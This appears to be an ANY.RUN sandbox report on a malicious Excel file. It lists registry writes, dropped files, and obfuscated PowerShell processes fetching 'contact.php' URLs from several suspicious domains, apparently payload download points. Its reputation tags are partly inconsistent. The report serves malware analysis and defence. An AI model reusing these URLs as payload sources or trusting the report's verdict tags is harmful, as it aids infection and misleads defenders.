686C2800CC1500000000044001000000F857E7E77268D501D2060000AC3AACC95C405A4883AEC3C90A3DBA78F857E7E77268D5010000000000001000BE4E402C0000000006000000000000000200000000000000000000000000556E6B6E6F776E00000000000000000000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C005400000000001D07FE01000002000000FE7F000000000000000000000000000000000000A8F40FA287000000200000000000000030000000000000002BAB8F7AFE7F00000000000000000000300000000000000000121B07FE010000000000000000000000001B07FE01000018012409FE0100001000000000000000200000000000000040000000000000002BAB8F7AFE7F00004000000000000000C00C1B07FE0100003B00000000000000400000000000000080002409FE010000000000000000000080161B07FE01000000000000FE7F000000001B07FE010000105F2009FE0100004000000000000000300000000000000000001D07FE010000D289019DFE7F00004000000000000000C00C1B07FE0100002C00000000000000700000000000000060F30FA287000000000000000000000000000000000000002C00000000000000000000000000000007000000000000007000000000000000600000000000000000001D07FE010000D289019DFE7F0000400000000000000000000000870000006000000000000000000000008700000080161B07FE010000000000000000000000001B07FE010000105F2009FE01000030000000000000002BAB8F7AFE7F000030000000000000007668019DFE7F000070F30FA287000000C00C1B07FE010000080000000000000070000000000000003000000000000000440045004600410055004C00540000000201000000000000000000000000000007000000000000007000000000000000600000000000000000001D07FE010000D289019DFE7F0000400000000000000000000000FE0100006000000000000000000000000000000000001D07FE0100009CBB019DFE7F0000F0060000000000001C000000000000001C00000000000000E0000000000000004000000000000000706BED08FE01000000001C00FE010000000000000000000000000000000000000100000000000000000000000000000090542009FE01000010000000000000002200000039000000000000000000000080542009FE01000080542009FE010000FF0300000000000080000000000000001001000000000000330000000000000033000000000000003300000000000000CFA28F7AFE7F00000C00000000000000000000000000000000031D07FE0100001C00000000000000B651FFFF6D0000000000000093FFFFFF30000000000000003CB11D07FE01000050011D07FE010000A20000000000000069F50FA287000000000000000000000004031D07FE01000033000000000000000C00000CFE010000FEFFFFFFFFFFFFFF02000002FE010000F0EE2307FE0100002C00000000000000400E2109FE0100001C00001C00000000F0060000000000003882967AFE7F00007668019DFE7F000033000000000000001D00000000000000440045004600410055004C00540000000C0000000000000002000002FE7F000068E4967AFE7F0000000000000000000000000000000000000F01000EFE7F00007007EC08FE010000B9AE081FFE7F000000001D07FE0100000200000200000000000000000000000000001D07FE01000000000000000000007668019DFE7F000030401D09FE010000390000398700000069F50FA287000000149E8F7AFE7F0000A8F60FA28700000040F50FA28700000068E4967AFE7F000040E4967AFE7F000000000000000000000000000000000000020100000000000000000000000000006F00000000000000F00600000000000000001D07FE010000AB8E019DFE7F000000001D07FE0100000200000000000000E006000000000000F00600000000000088061D07FE01000068F50FA28700000030FE1D09FE01000003000000FE7F0000FEFFFFFFFFFFFFFF000000000000000038F60FA28700000046F47D7AFE7F0000F0001E09FE010000E658B279FE7F0000000000000000000080DB0509FE01000000121B07FE010000E658B279FE7F00000100000000000000F0EEE975FE7F0000020100000000000000000000000000000800000000000000C348FA77FE7F000000552009FE010000E00600000000000010FA0FA287000000000000000000000090542009FE010000CB4BFA77FE7F0000A0542009FE01000010FA0FA2870000005ED143BAF568D501000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
10
Text files
42
Unknown types
8

Dropped files

PID
Process
Filename
Type
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oq0mj0bl.qco.ps1
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ukqoure.xp3.psm1
MD5:
SHA256:
5580EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF50A0A51BF34986B5.TMP
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\V.xml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\WS.xml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Stat\S.xml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Def\WD.xaml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Def\RA.xml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\I.xml
MD5:
SHA256:
556POWeRsHEll.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\WF\PS\default\S-1-5-21-1693682860-607145093-2874071422-1001\4fccc23c-5574-4537-8629-aaecee49cce8\Meta\UI.xml
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
25
TCP/UDP connections
23
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5580
EXCEL.EXE
GET
200
52.109.76.32:443
https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.11328.20158&ClientId=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.11328.20158&
IE
xml
307 Kb
whitelisted
1084
powershell.exe
GET
200
198.151.217.111:443
https://www.eurekalert.org/contact.php?4f4egrka
US
html
40.1 Kb
whitelisted
556
POWeRsHEll.exe
GET
200
95.174.65.250:443
https://poliyzsl.host/contact.php?jlcyccmu
unknown
text
67 b
unknown
1084
powershell.exe
GET
302
198.151.217.111:80
http://eurekalert.org/contact.php?4f4egrka
US
html
311 b
whitelisted
580
powershell.exe
GET
302
91.120.235.243:80
http://cmas.org/contact.php?1t4z241h
HU
html
221 b
whitelisted
580
powershell.exe
GET
200
91.120.235.243:443
https://cmas.org/contact.php?1t4z241h
HU
html
28.2 Kb
whitelisted
1924
powershell.exe
GET
200
207.159.143.179:80
http://jentygelbviehs.com/contact.php?ddyyj2ky
US
html
7.88 Kb
unknown
5464
svchost.exe
POST
200
40.90.137.126:443
https://login.live.com/RST2.srf
US
xml
9.89 Kb
whitelisted
3404
powershell.exe
GET
200
91.120.235.243:443
https://cmas.org/contact.php?sxv5zceg
HU
html
28.2 Kb
whitelisted
1948
powershell.exe
GET
409
173.254.48.196:80
http://purigopabali.com/contact.php?kn3qrjp5
US
html
83 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5580
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
5464
svchost.exe
40.90.137.126:443
login.live.com
Microsoft Corporation
US
unknown
5580
EXCEL.EXE
52.114.77.33:443
self.events.data.microsoft.com
Microsoft Corporation
IE
suspicious
3404
powershell.exe
91.120.235.243:80
cmas.org
T-Mobile Czech Republic a.s.
HU
unknown
3404
powershell.exe
91.120.235.243:443
cmas.org
T-Mobile Czech Republic a.s.
HU
unknown
2692
powershell.exe
207.159.143.179:80
jentygelbviehs.com
Peer 1 Network (USA) Inc.
US
unknown
5396
powershell.exe
43.241.57.18:80
amatapatong.com
dragonhispeed
TH
unknown
5580
EXCEL.EXE
52.109.76.6:443
officeclient.microsoft.com
Microsoft Corporation
IE
whitelisted
1948
powershell.exe
173.254.48.196:80
purigopabali.com
Unified Layer
US
unknown
5580
EXCEL.EXE
52.109.76.32:443
nexusrules.officeapps.live.com
Microsoft Corporation
IE
whitelisted

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
malicious
login.live.com
  • 40.90.137.126
  • 40.90.137.120
  • 40.90.23.154
whitelisted
self.events.data.microsoft.com
  • 52.114.77.33
  • 52.114.75.79
whitelisted
cmas.org
  • 91.120.235.243
whitelisted
jentygelbviehs.com
  • 207.159.143.179
unknown
amatapatong.com
  • 43.241.57.18
unknown
officeclient.microsoft.com
  • 52.109.76.6
whitelisted
purigopabali.com
  • 173.254.48.196
unknown
nexusrules.officeapps.live.com
  • 52.109.76.32
whitelisted
eurekalert.org
  • 198.151.217.111
whitelisted

Threats

No threats detected
Process
Message
EXCEL.EXE
2019-09-11 07:31:32.105 T#5456 <E> [AriaSDK] HTTP request WI-2 failed after 110 ms, events were rejected by the server (403) and will be all dropped
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
EXCEL.EXE
2019-09-11 07:37:11.589 T#5552 <E> [AriaSDK.PAL] PAL is already shutdown!
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
conhost.exe
InitSideBySide failed create an activation context. Error: 1814
mmc.exe
Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
MIL0001537426.xls